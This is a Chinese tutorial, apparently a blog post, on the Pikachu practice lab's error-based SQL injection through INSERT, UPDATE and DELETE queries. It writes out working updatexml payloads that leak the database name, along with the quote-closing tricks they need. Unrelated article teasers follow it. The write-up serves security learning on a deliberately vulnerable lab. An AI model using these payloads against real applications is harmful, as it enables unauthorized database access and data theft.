Pikachu-Sql Inject-insert/update/delete注入

Pikachu-Sql Inject-insert/update/delete注入

news/2024/10/4 11:15:31 标签: sql, 数据库

insert 注入

插入语句

insert into tables values(value1,value2,value3);
如：插入用户表
insert into users (id,name,password) values ('id','username','password');

当点击注册

先判断是否有SQL注入漏洞，经过判断之后发现存在SQL漏洞。构造insert的payload。

insert into users (id,name,password) values ('1'or updatexml(1,concat(0x7e,database()),0),'username','password');

//为了使得左右符号闭合，所以构造的输入payload 是
name' or updatexml(1,concat(0x7e,database()),0) or '

由于插入id 这里有个or 的或运算，所以会执行 updatexml 方法，实现报错注入。

同理，update 注入

update的 SQL语句

update users set passowrd='pass' ;

//构造update 注入语句：注意闭合
update users set passowrd='pass' or updatexml(1,concat(0x7e,database()),0) ;

如构造输入payload

aa' or updatexml(1,concat(0x7e,database()),0) or '

提交，获得数据库名；

基于delete 的报错注入

delete from users where username = 'username' ;

//构造delete 注入语句：注意闭合
delete from users where username = 'username' or updatexml(1,concat(0x7e,database()),0) or '' ;

//字符型
1' or updatexml(1,concat(0x7e,database()),0) or '　
//数字型
1 or updatexml(1,concat(0x7e,database()),0)

得到 delete 注入结果

总结：要注意开头部分的and和or，and不行那就改用or，或者用替换符&&（and）和||（or）,其次是闭合的方式不只有#和--+，还有or'

http://www.niftyadmin.cn/n/5689858.html

相关文章

【分布式微服务云原生】深入探索Redis Cluster：打造高效、可扩展的数据集群

【分布式微服务云原生】深入探索Redis Cluster：打造高效、可扩展的数据集群

深入探索Redis Cluster：打造高效、可扩展的数据集群摘要： 在追求高性能和可伸缩性的数据存储解决方案时，Redis Cluster模式成为了众多开发者的首选。本文将深入解析Redis Cluster的核心特性、工作原理以及如何配置和管理。通过实际的Java代…

阅读更多...

C#类的概念

C#类的概念

C#中类的概念类修饰符 class 类名 { } 类的修饰符： public : 不限制对类的访问 protected: 只能从所在的类和所在类的子类（派生类）中进行访问 internal: 同一个程序集的任何代码都可以进行访问 private: 只有其所在的类才能访问 ab…

阅读更多...

手部姿态映射到远程操作机器人

手部姿态映射到远程操作机器人

要将手部姿态数据映射到远程操作机器人，可以使用 Python 和一些库（如 mediapipe 和 numpy）来i简单实现这个功能。以下是一个具体的实现步骤，主要包括手部姿态检测、数据处理和关节位置映射。 1. 环境准备确保您安装了必要的库&…

阅读更多...

SQL_WHERE子句里不能出现COUNT()

SQL_WHERE子句里不能出现COUNT()

在 SQL 中，WHERE 子句通常用于过滤记录，它不能直接与聚合函数（如 COUNT()）一起使用。聚合函数通常在 SELECT 语句中与 GROUP BY 子句结合使用，以便对一组记录进行聚合计算。但是，如果你想基于某个计数来过…

阅读更多...

使用Spring Boot与AnalyticDB结合通义千问API实现智能PPT生成功能

使用Spring Boot与AnalyticDB结合通义千问API实现智能PPT生成功能

简介： 随着技术的发展，自动化工具在日常工作中变得越来越重要。今天我们将探讨如何使用Spring Boot框架结合阿里云的AnalyticDB数据库，并利用通义千问（Qwen）API来实现一个智能生成PPT的功能。这个应用将能够根据用户提…

阅读更多...

中阳：为投资者提供稳定的财富增值平台

中阳：为投资者提供稳定的财富增值平台

在瞬息万变的金融市场中，选择一个合适的投资平台至关重要。中阳凭借其丰富的市场经验、先进的技术支持和专业的客户服务，成为众多投资者的首选。本文将深入探讨中阳的核心优势，以及它如何帮助投资者实现财富的稳步增长。一、丰富的投资产品…

阅读更多...

微信小程序使用picker，数组怎么设置默认值

微信小程序使用picker，数组怎么设置默认值

默认先显示请选择XXX。然后点击弹出选择列表。如果默认value是0的话，他就直接默认显示数组的第一个了。<picker mode"selector" :value"planIndex" :range"planStatus" range-key"label" change"bindPlanChange&qu…

阅读更多...

maven安装本地jar包到本地仓库

maven安装本地jar包到本地仓库

有时候我们需要把本地的 jar 包 install 到本地的 maven 仓库，这时就需要手动install依赖项。例如，把下面的 zhdx-license-1.0.jar 安装到本地 maven 仓库的操作如下： <dependency><groupId>com.zhdx</groupId><artifa…

阅读更多...

最新文章